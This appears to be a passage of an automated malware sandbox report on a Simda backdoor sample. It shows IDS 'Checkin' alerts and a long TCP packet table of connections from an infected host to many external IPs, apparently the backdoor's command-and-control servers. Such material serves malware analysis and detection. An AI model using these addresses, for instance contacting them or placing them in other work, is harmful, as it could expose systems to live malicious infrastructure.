                                                                                                                                                                                                              2024-11-11T18:35:02.985591+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.854073162.255.119.10280TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.985591+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857727199.59.243.22780TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.985971+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773075.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.002515+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85772844.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.031389+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8577313.94.10.3480TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.045737+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857729208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.161869+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773218.208.156.24880TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.164148+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773344.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.235707+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857726188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.404492+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773575.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.560839+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857736208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.771982+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773791.195.240.1980TCP
                                                                                                                                                                                                              2024-11-11T18:35:05.028136+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857738188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:35:05.146304+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857734199.191.50.8380TCP
                                                                                                                                                                                                              2024-11-11T18:35:05.261454+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857739154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:35:05.626816+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857739154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:35:05.732821+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857740188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:35:07.697982+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857741188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:35:10.732799+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.854072178.162.203.20280TCP

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.166371107 CET4970780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358935118 CET8049707162.255.119.102192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.359006882 CET4970780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.359329939 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.359447002 CET4970780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.360014915 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.360194921 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.363753080 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.364115000 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365118980 CET80497083.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365148067 CET8049707162.255.119.102192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365194082 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365611076 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365835905 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.365886927 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366271973 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366415977 CET8049710208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366471052 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.366569042 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.369050026 CET8049711199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.369062901 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.369112015 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.369137049 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.370488882 CET80497083.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.371218920 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.371336937 CET8049710208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.373912096 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.374217033 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.379247904 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.379548073 CET8049711199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.443377972 CET4971380192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.449331045 CET8049713178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.449395895 CET4971380192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.449562073 CET4971380192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.455785036 CET8049713178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.643296003 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.648272991 CET804971475.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.648350954 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.648514032 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.653369904 CET804971475.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.659810066 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.666307926 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.666379929 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.666512012 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.671494961 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.793668985 CET80497083.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.793724060 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796216011 CET8049711199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796248913 CET8049711199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796276093 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.796309948 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.798945904 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.800307989 CET80497083.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.800565958 CET4970880192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.804769993 CET80497083.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.813263893 CET8049710208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.813309908 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.814102888 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.819031000 CET8049710208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.863749981 CET8049713178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.863846064 CET4971380192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.863980055 CET4971380192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.864780903 CET4971680192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.869009018 CET8049713178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.870850086 CET8049716178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.870913982 CET4971680192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.871138096 CET4971680192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.875977993 CET8049716178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.912132978 CET8049707162.255.119.102192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.912194014 CET4970780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.918771029 CET8049710208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.918824911 CET4971080192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.947422028 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.952562094 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.952625036 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.952713013 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.958971977 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.962917089 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.968425035 CET804971818.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.968507051 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.034069061 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.039391994 CET804971818.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.078133106 CET804971475.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.078196049 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.078365088 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.081645966 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.081685066 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.081756115 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.083658934 CET804971475.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.083718061 CET4971480192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.085290909 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.085381985 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.097176075 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.097255945 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.101541996 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.104904890 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.104923010 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.105811119 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.105901957 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.106545925 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.107583046 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.107630014 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.107753992 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.108011007 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.108031988 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.158313036 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.163429976 CET804972144.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.163501978 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.163611889 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.170151949 CET804972144.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.314558029 CET8049716178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.314627886 CET4971680192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.330492973 CET4971680192.168.2.8178.162.217.107
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.335370064 CET8049716178.162.217.107192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.403259993 CET804971818.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.403333902 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.408058882 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.412393093 CET804971818.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.412512064 CET4971880192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.413238049 CET804971818.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.548819065 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.548904896 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.551279068 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.551364899 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.608371973 CET804972144.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.609747887 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.619406939 CET804972144.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.623951912 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719140053 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719171047 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719183922 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719198942 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719211102 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719223976 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719227076 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719237089 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719249964 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719280958 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719295979 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719302893 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719326019 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.719364882 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724489927 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724510908 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724525928 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724536896 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724565029 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.724622965 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807060003 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807169914 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807183027 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807245016 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807456970 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807470083 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807482004 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807507992 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807531118 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807704926 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807717085 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807729006 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807753086 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807760954 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807773113 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807779074 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.807805061 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.855170012 CET4972180192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.859977961 CET804972144.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.864409924 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.869431973 CET8049722154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.869497061 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.878634930 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.883702040 CET8049722154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.907023907 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.907041073 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.907392025 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.907488108 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.910238981 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.910278082 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.910657883 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.910707951 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.921510935 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.924165010 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.967333078 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.971328020 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201514006 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201559067 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201580048 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201596022 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201607943 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201626062 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201647997 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201663971 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201668978 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201723099 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.201750040 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.287862062 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.287964106 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.289048910 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.289145947 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.289987087 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290004015 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290050983 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290071964 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290082932 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290126085 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290158987 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290163040 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290236950 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290694952 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.290746927 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364319086 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364371061 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364414930 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364425898 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364460945 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.364483118 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365056038 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365091085 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365142107 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365147114 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365165949 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365171909 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365231037 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.365256071 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.366918087 CET49719443192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.366931915 CET4434971975.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653331041 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653353930 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653366089 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653424978 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653460979 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653472900 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653485060 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653496027 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653508902 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653513908 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653520107 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653525114 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653532982 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653554916 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.653579950 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.658366919 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.658384085 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.658423901 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.658456087 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734415054 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734427929 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734438896 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734484911 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734538078 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734841108 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734853029 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734863997 CET8049709199.191.50.83192.168.2.8
